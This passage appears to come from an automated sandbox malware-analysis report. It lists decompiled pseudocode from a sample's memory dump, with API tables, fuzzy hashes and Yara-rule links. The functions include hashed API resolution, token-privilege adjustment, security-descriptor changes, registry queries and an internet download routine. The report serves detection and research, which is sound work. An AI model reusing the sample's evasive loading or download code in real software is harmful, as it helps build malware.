0x0009ae03
0x0009ae06
0x0009ae0b
0x0009ae0e
0x0009ae0e
0x0009ae03
0x0009ade2
0x0009ae17
0x0009ae22
0x00000000

APIs

Part of subcall function 000AB530: GetTokenInformation.KERNELBASE(0009ADD7,00000001,00000000,00000000,?,0009ADD7,00000000), ref: 000AB55A
Part of subcall function 000AB530: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000AB5B5

GetTokenInformation.KERNELBASE(00000000,0000000C,00000000,00000004,?), ref: 0009ADFF

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

CloseHandle.KERNEL32(00000000), ref: 0009AE22

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InformationToken$CloseFreeHandleHeap
String ID:
API String ID: 2052167596-0
Opcode ID: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction ID: b37742305f65ce12f0e32efa7ea092cefdbb4e05abe4ea9711172d8814755a93
Opcode Fuzzy Hash: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction Fuzzy Hash: 5911C676E0011877EF2166A4BC12BAF76689F52B14F054134FD1866242FB71AA2496E3

Uniqueness

Uniqueness Score: -1.00%

Function 000AB530, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000AB530(void* __eax, void* __eflags, void* _a4) {
				long _v20;
				int _t11;
				signed char _t16;
				void* _t17;
				int _t19;
				DWORD* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;

				_v20 = 0;
				E0009BF50(__eflags, 9, 0xbd557e);
				_t25 = _t24 + 8;
				_t21 =  &_v20;
				_t11 = GetTokenInformation(_a4, 1, 0, 0, _t21); // executed
				_t23 = 0;
				_t30 = _t11;
				if(_t11 == 0) {
					_t16 = E000955C0( *((intOrPtr*)(E0009BF50(_t30, 0, E00099D50(0x68042b4e))))(), 0x7a);
					_t25 = _t25 + 0x14;
					if((_t16 & 0x00000001) != 0) {
						_t17 = E00098290(_v20);
						_t25 = _t25 + 4;
						_t32 = _t17;
						if(_t17 != 0) {
							_t22 = _t17;
							E0009BF50(_t32, 9, 0xbd557e);
							_t25 = _t25 + 8;
							_t19 = GetTokenInformation(_a4, 1, _t22, _v20, _t21); // executed
							_t23 = _t22;
							if(_t19 == 0) {
								E0009B570(_t22);
								_t25 = _t25 + 4;
								_t23 = 0;
							}
						}
					}
				}
				return _t23;
			}

0x000ab537
0x000ab545
0x000ab54a
0x000ab54d
0x000ab55a
0x000ab55c
0x000ab55e
0x000ab560
0x000ab57f
0x000ab584
0x000ab589
0x000ab58e
0x000ab593
0x000ab596
0x000ab598
0x000ab59a
0x000ab5a3
0x000ab5a8
0x000ab5b5
0x000ab5b9
0x000ab5bb
0x000ab5be
0x000ab5c3
0x000ab5c6
0x000ab5c6
0x000ab5bb
0x000ab598
0x000ab589
0x000ab5d1

APIs

GetTokenInformation.KERNELBASE(0009ADD7,00000001,00000000,00000000,?,0009ADD7,00000000), ref: 000AB55A

Part of subcall function 00098290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000AB5B5

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: HeapInformationToken$AllocateFreeLibraryLoad
String ID:
API String ID: 4190244075-0
Opcode ID: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction ID: c02346bfaffdcde126331413b0063d1c4020c592f3f22175bb62d888ac9fafc5
Opcode Fuzzy Hash: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction Fuzzy Hash: 1E01C872E8071836EE6165F47C43FBF7D5D9F52B59F050030F90CA5193F6929A1491A2

Uniqueness

Uniqueness Score: -1.00%

Function 0009E030, Relevance: 3.1, APIs: 2, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0009E030(void* __eflags, void* _a4, short* _a8, short* _a12) {
				void* _t9;
				long _t12;
				signed int _t14;
				intOrPtr* _t15;
				int _t20;
				signed int _t21;

				_t31 = __eflags;
				_t20 = (E000A5000(_t9, __eflags, 0xffffffff) & 0x000000ff) << 0x00000008 | 0x00000001;
				E0009BF50(_t31, 9, 0xda29a27);
				_t12 = RegOpenKeyExW(_a4, _a8, 0, _t20,  &_a4); // executed
				if(_t12 == 0) {
					E0009BF50(__eflags, 9, 0x8097c7);
					_t14 = RegQueryValueExW(_a4, _a12, 0, 0, 0, 0); // executed
					__eflags = _t14;
					_t7 = _t14 == 0;
					__eflags = _t7;
					_t21 = _t20 & 0xffffff00 | _t7;
					_t15 = E0009BF50(_t7, 9, 0x3111c69);
					 *_t15(_a4);
				} else {
					_t21 = 0;
				}
				return _t21;
			}

0x0009e030
0x0009e04c
0x0009e056
0x0009e067
0x0009e06b
0x0009e07b
0x0009e08f
0x0009e091
0x0009e093
0x0009e093
0x0009e093
0x0009e09d
0x0009e0a8
0x0009e06d
0x0009e06d
0x0009e06d
0x0009e0b0

APIs

RegOpenKeyExW.KERNEL32(00000000,80000001,00000000,00000000,?,?,?,?), ref: 0009E067
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 0009E08F

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: OpenQueryValue
String ID:
API String ID: 4153817207-0
Opcode ID: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction ID: 78661935677944fcadbb7ef02a500823dea520f1cf60ceb67f17524cb1b54881
Opcode Fuzzy Hash: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction Fuzzy Hash: 3601F9776803183EEF1059A5AC53FEA3608DB81B65F140130FE1CAA1C3EAD1FA1596F1

Uniqueness

Uniqueness Score: -1.00%

Function 00093F90, Relevance: 3.1, APIs: 2, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00093F90(void* _a4, intOrPtr _a8) {
				intOrPtr _t4;
				long _t8;
				void* _t10;
				void* _t14;
				void* _t15;
				long _t17;

				_t4 = _a8;
				_t25 = _t4;
				if(_t4 == 0) {
					return 0;
				}
				_t8 = E000922E0(_t25, E00091460(_t25, _t4, 0x8f5419a3) + 4, 0x8f5419a3);
				_t26 = _a4;
				_t17 = _t8;
				if(_a4 == 0) {
					E0009BF50(__eflags, 0, 0x8685de3);
					_t10 = RtlAllocateHeap( *0xb2124, 8, _t17); // executed
					return _t10;
				}
				E0009BF50(_t26, 0, E00099D50(0x6caeab8f));
				_t15 =  *0xb2124; // 0x2b0000
				_t14 = RtlReAllocateHeap(_t15, E00099D50(0x647400a4), _a4, _t17); // executed
				return _t14;
			}

0x00093f96
0x00093f99
0x00093f9b
0x00000000
0x00093ffb
0x00093fb4
0x00093fbc
0x00093fc0
0x00093fc2
0x00094006
0x00094017
0x00000000
0x00094017
0x00093fd4
0x00093fdc
0x00093ff7
0x00000000

APIs

RtlReAllocateHeap.NTDLL(002B0000,00000000,00000000,00000000), ref: 00093FF7
RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00094017

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 47756d77778bd37679b19cedd15490441639e744638df791e2f3920e79aaed9f
Instruction ID: 59310788cf4f6075fd4ca10262006a59aba758a0c958dda9fa40e88a89838614
Opcode Fuzzy Hash: 47756d77778bd37679b19cedd15490441639e744638df791e2f3920e79aaed9f
Instruction Fuzzy Hash: 9801F9B6D041047BEE102274FC13FAE369C9B653ADF050430FD0DA1203F9619B14AAF2

Uniqueness

Uniqueness Score: -1.00%

Function 000A9C40, Relevance: 2.5, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A9C40(void* __eflags, void** _a4) {
				int _t6;
				int _t8;
				void** _t10;
				void* _t11;
				void* _t12;

				_t10 = _a4;
				_t6 = E00094A90( *_t10, 0);
				_t12 = _t11 + 8;
				_t15 = _t6 & 0x00000001;
				if((_t6 & 0x00000001) == 0) {
					E0009BF50(_t15, 0, 0xb1fd105);
					_t12 = _t12 + 8;
					_t6 = VirtualFree( *_t10, 0, 0x8000); // executed
				}
				_t16 = _t10[2];
				if(_t10[2] != 0) {
					E0009BF50(_t16, 0, 0xb8e7db5);
					_t8 = CloseHandle(_t10[2]); // executed
					return _t8;
				}
				return _t6;
			}

0x000a9c44
0x000a9c4b
0x000a9c50
0x000a9c53
0x000a9c55
0x000a9c5e
0x000a9c63
0x000a9c6f
0x000a9c6f
0x000a9c71
0x000a9c75
0x000a9c7e
0x000a9c89
0x00000000
0x000a9c89
0x000a9c8d

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C6F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000A9C89

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CloseFreeHandleVirtual
String ID:
API String ID: 2443081362-0
Opcode ID: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction ID: 905793d0daaa26e2a5b72c4c53da7d7b4e298965dc6cf40139e6e8747d7e902f
Opcode Fuzzy Hash: a4f2532af7a3c8ab7226c92353103c1daa717502fab38bd949c9bf743f9d1cf9
Instruction Fuzzy Hash: 0FE0D836784304B6EE2036E0FD17F9472945F11B66F104434FA8D751E6F6E279109AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0009BF50, Relevance: 1.7, APIs: 1, Instructions: 182
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0009BF50(void* __eflags, signed int _a4, signed int _a8) {
				signed int* _v20;
				char _v52;
				char _v159;
				signed int _t32;
				intOrPtr _t35;
				struct HINSTANCE__* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed int _t51;
				signed int* _t52;
				signed int _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				void* _t62;

				_t60 = _a8;
				_t32 = E00099D50(0x647402c4);
				_t62 = _t61 + 4;
				_t57 = _t60 % _t32;
				_t35 =  *((intOrPtr*)(0xb2cb8 + _t57 * 4));
				_t58 = _t57;
				if(_t35 == 0) {
					L4:
					_t51 = _a4;
					_v20 = 0xb2cb8 + _t58 * 4;
					if(_t51 > 0x23) {
						L39:
						_t37 =  *(0xb2134 + _t51 * 4);
						if( *(0xb2134 + _t51 * 4) != 0) {
							L49:
							_t38 = E0009D830(_t37, _t60);
							_t52 = _v20;
							__eflags = _t38;
							if(__eflags != 0) {
								L52:
								 *_t52 = _t60;
								 *(0xb4198 + _t58 * 4) = _t38;
								return _t38;
							}
							_t39 = E0009BF50(__eflags, 0, 0xba94474);
							 *_t39(0);
							L51:
							_t38 = 0;
							goto L52;
						}
						if(_t51 == 0x17) {
							_t37 =  *0xb37cc; // 0x0
							__eflags = _t37;
							if(__eflags != 0) {
								L48:
								 *(0xb2134 + _t51 * 4) = _t37;
								goto L49;
							}
							L46:
							_t41 = E0009BF50(_t77, 0, 0xba94474);
							 *_t41(0);
							 *(0xb2134 + _t51 * 4) = 0;
							_t52 = _v20;
							goto L51;
						}
						if(_t51 == 0x16) {
							_t37 =  *0xb4b38; // 0x0
							__eflags = _t37;
							if(__eflags == 0) {
								goto L46;
							}
							goto L48;
						}
						if(_t51 != 0x15) {
							_t37 = LoadLibraryA( &_v52); // executed
							__eflags = _t37;
							if(__eflags != 0) {
								goto L48;
							}
							goto L46;
						}
						_t37 =  *0xb37d0; // 0x0
						_t77 = _t37;
						if(_t37 != 0) {
							goto L48;
						}
						goto L46;
					}
					switch( *((intOrPtr*)(_t51 * 4 +  &M000B00B0))) {
						case 0:
							L38:
							E0009C560( &_v52, E0009D0A0(0xb0550, 0xb0550,  &_v159), 0xffffffff);
							_t62 = _t62 + 0x14;
							goto L39;
						case 1:
							goto L38;
						case 2:
							__eax = 0xb0bfc;
							goto L38;
						case 3:
							__eax = 0xb0894;
							goto L38;
						case 4:
							__eax = 0xb1044;
							goto L38;
						case 5:
							__eax = 0xb05e2;
							goto L38;
						case 6:
							__eax = 0xb07e9;
							goto L38;
						case 7:
							__eax = 0xb043c;
							goto L38;
						case 8:
							__eax = 0xb0538;
							goto L38;
						case 9:
							__eax = 0xb0781;
							goto L38;
						case 0xa:
							__eax = 0xb09fc;
							goto L38;
						case 0xb:
							__eax = 0xb097c;
							goto L38;
						case 0xc:
							__eax = 0xb101b;
							goto L38;
						case 0xd:
							__eax = 0xb07a6;
							goto L38;
						case 0xe:
							__eax = 0xb068d;
							goto L38;
						case 0xf:
							__eax = 0xb0b87;
							goto L38;
						case 0x10:
							__eax = 0xb0c24;
							goto L38;
						case 0x11:
							__eax = 0xb0b75;
							goto L38;
						case 0x12:
							__eax = 0xb09bc;
							goto L38;
						case 0x13:
							__eax = 0xb04b8;
							goto L38;
						case 0x14:
							__eax = 0xb052c;
							goto L38;
						case 0x15:
							goto L39;
						case 0x16:
							__eax = 0xb0814;
							goto L38;
						case 0x17:
							__eax = 0xb0900;
							goto L38;
						case 0x18:
							__eax = 0xb0480;
							goto L38;
						case 0x19:
							__eax = 0xb076e;
							goto L38;
						case 0x1a:
							__eax = 0xb0699;
							goto L38;
						case 0x1b:
							__eax = 0xb04db;
							goto L38;
						case 0x1c:
							__eax = 0xb0c31;
							goto L38;
						case 0x1d:
							__eax = 0xb0b60;
							goto L38;
						case 0x1e:
							__eax = 0xb09c4;
							goto L38;
						case 0x1f:
							__eax = 0xb0a2c;
							goto L38;
						case 0x20:
							__eax = 0xb09a6;
							goto L38;
					}
				}
				0;
				0;
				while(1) {
					_t69 = _t35 - _t60;
					if(_t35 == _t60) {
						break;
					}
					E00091460(_t69, _t58, 1);
					_t62 = _t62 + 8;
					_t58 =  >  ? 0 : _t58 + 1;
					_t35 =  *((intOrPtr*)(0xb2cb8 + _t58 * 4));
					if(_t35 != 0) {
						continue;
					}
					goto L4;
				}
				return  *(0xb4198 + _t58 * 4);
			}

0x0009bf5c
0x0009bf64
0x0009bf69
0x0009bf74
0x0009bf76
0x0009bf7d
0x0009bf81
0x0009bfb6
0x0009bfb6
0x0009bfc0
0x0009bfc6
0x0009c0fe
0x0009c0fe
0x0009c107
0x0009c163
0x0009c165
0x0009c16d
0x0009c170
0x0009c172
0x0009c189
0x0009c189
0x0009c18b
0x00000000
0x0009c18b
0x0009c17b
0x0009c185
0x0009c187
0x0009c187
0x00000000
0x0009c187
0x0009c10c
0x0009c127
0x0009c12c
0x0009c12e
0x0009c15c
0x0009c15c
0x00000000
0x0009c15c
0x0009c130
0x0009c137
0x0009c141
0x0009c143
0x0009c14e
0x00000000
0x0009c14e
0x0009c111
0x0009c153
0x0009c158
0x0009c15a
0x00000000
0x00000000
0x00000000
0x0009c15a
0x0009c116
0x0009c1a1
0x0009c1a7
0x0009c1a9
0x00000000
0x00000000
0x00000000
0x0009c1ab
0x0009c11c
0x0009c121
0x0009c123
0x00000000
0x00000000
0x00000000
0x0009c125
0x0009bfd1
0x00000000
0x0009c0df
0x0009c0f6
0x0009c0fb
0x00000000
0x00000000
0x00000000
0x00000000
0x0009bfee
0x00000000
0x00000000
0x0009bff8
0x00000000
0x00000000
0x0009c002
0x00000000
0x00000000
0x0009c00c
0x00000000
0x00000000
0x0009c016
0x00000000
0x00000000
0x0009c020
0x00000000
0x00000000
0x0009c02a
0x00000000
0x00000000
0x0009c034
0x00000000
0x00000000
0x0009c03e
0x00000000
0x00000000
0x0009c048
0x00000000
0x00000000
0x0009c052
0x00000000
0x00000000
0x0009c05c
0x00000000
0x00000000
0x0009c063
0x00000000
0x00000000
0x0009c06a
0x00000000
0x00000000
0x0009c071
0x00000000
0x00000000
0x0009c078
0x00000000
0x00000000
0x0009c07f
0x00000000
0x00000000
0x0009c086
0x00000000
0x00000000
0x0009c08d
0x00000000
0x00000000
0x00000000
0x00000000
0x0009c094
0x00000000
0x00000000
0x0009c09b
0x00000000
0x00000000
0x0009c0a2
0x00000000
0x00000000
0x0009c0a9
0x00000000
0x00000000
0x0009c0b0
0x00000000
0x00000000
0x0009c0da
0x00000000
0x00000000
0x0009c0b7
0x00000000
0x00000000
0x0009c0be
0x00000000
0x00000000
0x0009c0c5
0x00000000
0x00000000
0x0009c0cc
0x00000000
0x00000000
0x0009c0d3
0x00000000
0x00000000
0x0009bfd1
0x0009bf89
0x0009bf8d
0x0009bf90
0x0009bf90
0x0009bf92
0x00000000
0x00000000
0x0009bf97
0x0009bf9c
0x0009bfa8
0x0009bfab
0x0009bfb4
0x00000000
0x00000000
0x00000000
0x0009bfb4
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6b596c4b825b87af034dd83db79eddaacb788d6ace99750f3c6a484d6c5f2052
Instruction ID: 0b1bd87d8382e675236564e8b84030d3a1a2fb833d4548e60d4beaf6911734a0
Opcode Fuzzy Hash: 6b596c4b825b87af034dd83db79eddaacb788d6ace99750f3c6a484d6c5f2052
Instruction Fuzzy Hash: 5F517361F88309D7FF20AA98EC50EFFA2969795308F508132B507CB293D62ADD807756

Uniqueness

Uniqueness Score: -1.00%

Function 0009D270, Relevance: 1.6, APIs: 1, Instructions: 98
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009D270(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				signed short _v32;
				intOrPtr _v40;
				char _v44;
				void* _t22;
				void* _t23;
				intOrPtr _t26;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t37;
				void* _t43;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;

				_t22 = E000AFCF0(__ecx);
				_t54 =  &_v44;
				_t23 = E000A0190(__eflags, _t22,  &_v44);
				_t57 = _t56 + 8;
				_t64 = _t23;
				if(_t23 == 0) {
					_t43 = 0;
				} else {
					_t26 = E000AB790(_t64,  *0xb2838, _v44, _v32 & 0x0000ffff, _a8); // executed
					_t58 = _t57 + 0x10;
					if(_t26 == 0) {
						_t43 = 0;
					} else {
						_v20 = 1 + (0 | _v30 == 0x00000002) * 4;
						_t31 = E000AF190(__edx);
						_t32 = E000AEE10(__edx);
						_v20 = _t26;
						_t33 = E000ABAD0(_v30 - 2, _t26, _v40, 0, _t32, _t31, _v20); // executed
						_t61 = _t58 - 4 + 0x1c;
						if(_t33 == 0) {
							_t43 = 0;
							_t54 =  &_v44;
						} else {
							_t53 = _t33;
							_t37 = E00091AF0(_t53,  &_v28, 0,  *0xb2c80); // executed
							_t62 = _t61 + 0x10;
							_t68 = _t37;
							_t54 =  &_v44;
							if(_t37 == 0) {
								_t43 = 0;
								__eflags = 0;
							} else {
								E000AF410(_v28, _a4, _v28, _v24 + _v28);
								E0009B570(_v28);
								_t62 = _t62 + 4;
								_t43 = 1;
							}
							E0009BF50(_t68, 0x13, 0x714b685);
							_t61 = _t62 + 8;
							InternetCloseHandle(_t53); // executed
						}
						E000ABA40(_t68, _v20);
						_t58 = _t61 + 4;
					}
					E000AB690(_t54);
				}
				return _t43;
			}

0x0009d27b
0x0009d280
0x0009d285
0x0009d28a
0x0009d28d
0x0009d28f
0x0009d337
0x0009d295
0x0009d2a6
0x0009d2ab
0x0009d2b0
0x0009d33b
0x0009d2b6
0x0009d2ca
0x0009d2cd
0x0009d2d6
0x0009d2e8
0x0009d2ec
0x0009d2f1
0x0009d2f6
0x0009d33f
0x0009d341
0x0009d2f8
0x0009d2f8
0x0009d307
0x0009d30c
0x0009d30f
0x0009d311
0x0009d314
0x0009d346
0x0009d346
0x0009d316
0x0009d323
0x0009d32b
0x0009d330
0x0009d333
0x0009d333
0x0009d34f
0x0009d354
0x0009d358
0x0009d358
0x0009d35e
0x0009d363
0x0009d363
0x0009d367
0x0009d36c
0x0009d378

APIs

Part of subcall function 000AB790: InternetOpenA.WININET(000B0580,?,00000000,00000000,00000000,?,0009CD77,?,?,?,00000001,00000000,?,0009CD77,?,00000001), ref: 000AB7C2
Part of subcall function 000AB790: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000AB862

Part of subcall function 000ABAD0: HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000ABBA3

Part of subcall function 00091AF0: InternetReadFile.WININET(?,?,00040000,00040000), ref: 00091B86

InternetCloseHandle.WININET(00000000), ref: 0009D358

Part of subcall function 0009B570: HeapFree.KERNEL32(00000000,000A54D2,000A54D2,?), ref: 0009B593

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Internet$Open$CloseConnectFileFreeHandleHeapHttpReadRequest
String ID:
API String ID: 3651809878-0
Opcode ID: d7d22948cb9a4f5c1e9cd48b0aac864fac0640b8ca60a1617f4aa234b30d8a89
Instruction ID: 08c8c731cd60d4795642b458628f1f94130608dbed7bd3f3a156df419ae2e68f
Opcode Fuzzy Hash: d7d22948cb9a4f5c1e9cd48b0aac864fac0640b8ca60a1617f4aa234b30d8a89
Instruction Fuzzy Hash: 7321E4B2E401096BDF00ABE4AC42AFF7BB9DF45754F084435FA04A7203E7759A15A6A2

Uniqueness

Uniqueness Score: -1.00%

Function 000A0F60, Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E000A0F60(void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v88;
				char _v288;
				void* _t18;
				intOrPtr* _t20;
				void* _t23;
				void* _t24;
				intOrPtr* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				void* _t45;
				void* _t51;
				void* _t52;
				void* _t55;

				_t55 = __eflags;
				_v20 = 0;
				E000A9C90(_t55, E00097200(0xb1060,  &_v88), 1); // executed
				_t18 = E00099D50(0x647400a5);
				_t20 = E0009BF50(_t55, _t18, E00099D50(0x6ec8785b));
				_t36 =  !=  ? 0xb08d0 : 0xb10b0;
				_t23 = E00097200( !=  ? 0xb08d0 : 0xb10b0,  &_v288);
				_t51 = _t45 + 0x28;
				_t24 =  *_t20(_t23, 1,  &_v20, 0);
				_t57 = _t24;
				if(_t24 != 0) {
					_v24 = 0;
					_t26 = E0009BF50(_t57, 9, 0x8a8238c);
					_t52 = _t51 + 8;
					_t27 =  *_t26(_v20,  &_v32,  &_v24,  &_v28);
					_t58 = _t27;
					if(_t27 != 0) {
						_t30 = E0009BF50(_t58, 9, 0x90ec817);
						_t31 = E00099D50(0x647400bc);
						_t52 = _t52 + 0xc;
						 *_t30(_a4, _a8, _t31, 0, 0, 0, _v24); // executed
					}
					_t28 = E0009BF50(_t58, 0, 0x982abe5);
					 *_t28(_v20);
				}
				return 1;
			}

0x000a0f60
0x000a0f72
0x000a0f8a
0x000a0f97
0x000a0fb0
0x000a0fc6
0x000a0fd1
0x000a0fd6
0x000a0fe2
0x000a0fe4
0x000a0fe6
0x000a0fe8
0x000a0ff6
0x000a0ffb
0x000a100d
0x000a100f
0x000a1011
0x000a101d
0x000a102f
0x000a1034
0x000a1043
0x000a1043
0x000a104c
0x000a1057
0x000a1057
0x000a1065

APIs

Part of subcall function 000A9C90: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000A9D70

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

SetNamedSecurityInfoW.ADVAPI32(00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 000A1043

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AdjustInfoLibraryLoadNamedPrivilegesSecurityToken
String ID:
API String ID: 2785814242-0
Opcode ID: 53d3e8d696b554b7c62aea9b8f815d1285d86a263c3720ca7b5fc58d2305688d
Instruction ID: d0b0b4c89df3dddfb10bebbd31f6cbdb2178e57db3e88d39798a30296292a3ab
Opcode Fuzzy Hash: 53d3e8d696b554b7c62aea9b8f815d1285d86a263c3720ca7b5fc58d2305688d
Instruction Fuzzy Hash: E721D8B2E402197BEF1066A0AC13FFF36689B11714F050434FA18B6283F5A16A1487F2

Uniqueness

Uniqueness Score: -1.00%

Function 000A2F00, Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E000A2F00(void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				intOrPtr _v52;
				char _v56;
				char _v84;
				char _v118;
				char _v160;
				intOrPtr* _t9;
				intOrPtr* _t13;
				intOrPtr* _t16;
				struct HINSTANCE__* _t17;
				WCHAR* _t19;
				struct HWND__* _t22;
				char* _t25;

				_t36 = __eflags;
				_t25 =  &_v56;
				E000A8F20(_t25, 0x28);
				_v52 = E000A1070;
				_t9 = E0009BF50(__eflags, 0, 0xa39ecc7);
				_v40 =  *_t9(0);
				_v20 = E00097200(0xb0c10,  &_v118);
				_t13 = E0009BF50(_t36, 1, 0x38227e7);
				 *_t13(_t25);
				E0009BF50(_t36, 1, 0xf3c7b77);
				_t16 = E0009BF50(_t36, 0, 0xa39ecc7);
				_t17 =  *_t16(0);
				_t19 = E00097200(0xb0790,  &_v84);
				_t22 = CreateWindowExW(0, E00097200(0xb0c10,  &_v160), _t19, 0xcf0000, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, _t17, 0); // executed
				return _t22;
			}

0x000a2f00
0x000a2f0c
0x000a2f12
0x000a2f1a
0x000a2f28
0x000a2f34
0x000a2f48
0x000a2f52
0x000a2f5b
0x000a2f64
0x000a2f75
0x000a2f7f
0x000a2f8c
0x000a2fce
0x000a2fda

APIs

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

CreateWindowExW.USER32(00000000,00000000,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000A2FCE

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateLibraryLoadWindow
String ID:
API String ID: 4174337752-0
Opcode ID: b33be60579bcbc8d244ce09eea1e3476b85ed4de72df16617eecf2a092608ca4
Instruction ID: 8cf9f4e8ccaace393dda7e269f6ab2b87a3cdffb05642fcb61ba9ad7d9cde57a
Opcode Fuzzy Hash: b33be60579bcbc8d244ce09eea1e3476b85ed4de72df16617eecf2a092608ca4
Instruction Fuzzy Hash: EA111277E942187AF76066F06C03FEE76589B51B15F240125FF0C79283EAD12A1446B6

Uniqueness

Uniqueness Score: -1.00%

Function 00091490, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00091490(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, signed char _a20, signed char _a24) {
				signed int _v20;
				char _v540;
				void* _t16;
				long _t23;
				intOrPtr* _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;
				void* _t31;
				void* _t33;

				_t27 = _a20 & 0x000000ff;
				_t28 = 0;
				_v20 = _a24 & 0x000000ff;
				do {
					_t14 =  &_v540;
					E00095CD0(_t35, _a4,  &_v540, _t27, _v20);
					_t16 = E000A8960(_a12, _a8, _t14);
					_t33 = _t31 + 0x1c;
					if(_t16 == 0) {
						goto L2;
					}
					_t37 = _a16;
					if(_a16 == 0) {
						L1:
						E0009BF50(__eflags, 0, 0xbf8ba27);
						_t33 = _t33 + 8;
						_t23 = GetFileAttributesW(_a12); // executed
						__eflags = _t23 - 0xffffffff;
						if(__eflags == 0) {
							return 1;
						}
						goto L2;
					}
					_t25 = E0009BF50(_t37, 3, 0xd85c117);
					_t33 = _t33 + 8;
					_t26 =  *_t25(_a12, _a16);
					_t38 = _t26;
					if(_t26 != 0) {
						goto L1;
					}
					L2:
					_t30 = E000922E0(_t38, 0,  !_t28);
					E00091460(_t38, _t28, 1);
					_t31 = _t33 + 0x10;
					_t35 = _t30 - 0x64;
					_t28 = _t30;
				} while (_t30 != 0x64);
				return 0;
			}

0x000914a0
0x000914a4
0x000914a6
0x000914ec
0x000914f0
0x000914fc
0x0009150b
0x00091510
0x00091515
0x00000000
0x00000000
0x00091517
0x0009151b
0x000914b0
0x000914b7
0x000914bc
0x000914c2
0x000914c4
0x000914c7
0x00000000
0x00091542
0x00000000
0x000914c7
0x00091524
0x00091529
0x00091532
0x00091534
0x00091536
0x00000000
0x00000000
0x000914c9
0x000914d8
0x000914dd
0x000914e2
